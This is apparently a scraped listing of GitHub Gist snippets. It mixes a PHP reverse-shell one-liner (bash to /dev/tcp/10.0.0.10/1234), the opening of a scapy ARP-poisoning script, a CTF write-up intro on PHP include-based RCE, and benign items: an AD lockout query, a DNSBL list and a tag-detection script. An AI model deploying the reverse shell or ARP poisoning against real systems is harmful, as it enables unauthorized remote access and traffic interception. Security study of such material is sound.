Executable and Linkable Format (ELF), is the default binary format on Linux-based systems.
testuser-aaa
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); |
MyITGuy
/ acct_lockout_with_time.ps1
Created
November 15, 2014 20:43
PowerShell: Locked Out Accounts with Lockout Time
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Search-ADAccount -LockedOut | Get-ADUser -Properties lockoutTime | Select @{Name="sAMAccountName";Expression={$_.sAMAccountName.ToUpper()}},@{Name="LockoutTime";Expression={([datetime]::FromFileTime($_.lockoutTime).ToLocalTime())}} | Sort LockoutTime -Descending |
richarddun
/ gist:1bb11d32cafc394efbcb8f4a8b6cb130
Last active
January 30, 2025 19:33
scapy script to send http requests
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """ | |
| Script to open TCP connection and send 1 HTTP GET request containing | |
| a specific string, and header | |
| Usage: | |
| ./http.py <IP_of_target> | |
| There is only one mandatory argument, which is the target IP address. |
adgooroo
/ gist:aae14456ba53abff8b4c3f45cdb01e80
Last active
April 6, 2023 21:17
Список DNSBL List 2023
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0spam.fusionzero.com | |
| 2.0.0.127.b.barracudacentral.org | |
| 3y.spam.mrs.kithrup.com | |
| abuse.earthlink.net | |
| abuse.org | |
| abuse.rfc-ignorant.org | |
| accept.the-carrot-and-the-stick.com | |
| access.redhawk.org | |
| all.rbl.kropka.net | |
| all.s5h.net |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (() => { | |
| let gadgets = []; | |
| if (typeof _satellite !== 'undefined') { | |
| gadgets.push('Adobe Dynamic Tag Management'); | |
| } | |
| if (typeof BOOMR !== 'undefined') { | |
| gadgets.push('Akamai Boomerang'); | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from scapy.all import * | |
| import threading | |
| import argparse | |
| import pdb | |
| import sys | |
| import os | |
| class ARPPoisoning(threading.Thread): |
loknop
/ writeup.md
Created
December 30, 2021 14:59
Solving "includer's revenge" from hxp ctf 2021 without controlling any files
The challenge was to achieve RCE with this file:
<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');Some additional hardening was applied to the php installation to make sure that previously known solutions wouldn't work (for further information read this writeup from the challenge author).
I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.